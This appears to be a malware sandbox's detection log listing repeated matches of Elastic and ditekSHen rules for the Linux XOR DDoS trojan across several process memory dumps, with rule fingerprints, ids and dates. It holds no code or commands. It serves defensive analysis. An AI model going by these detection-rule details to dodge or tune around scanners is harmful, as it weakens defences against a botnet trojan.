Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
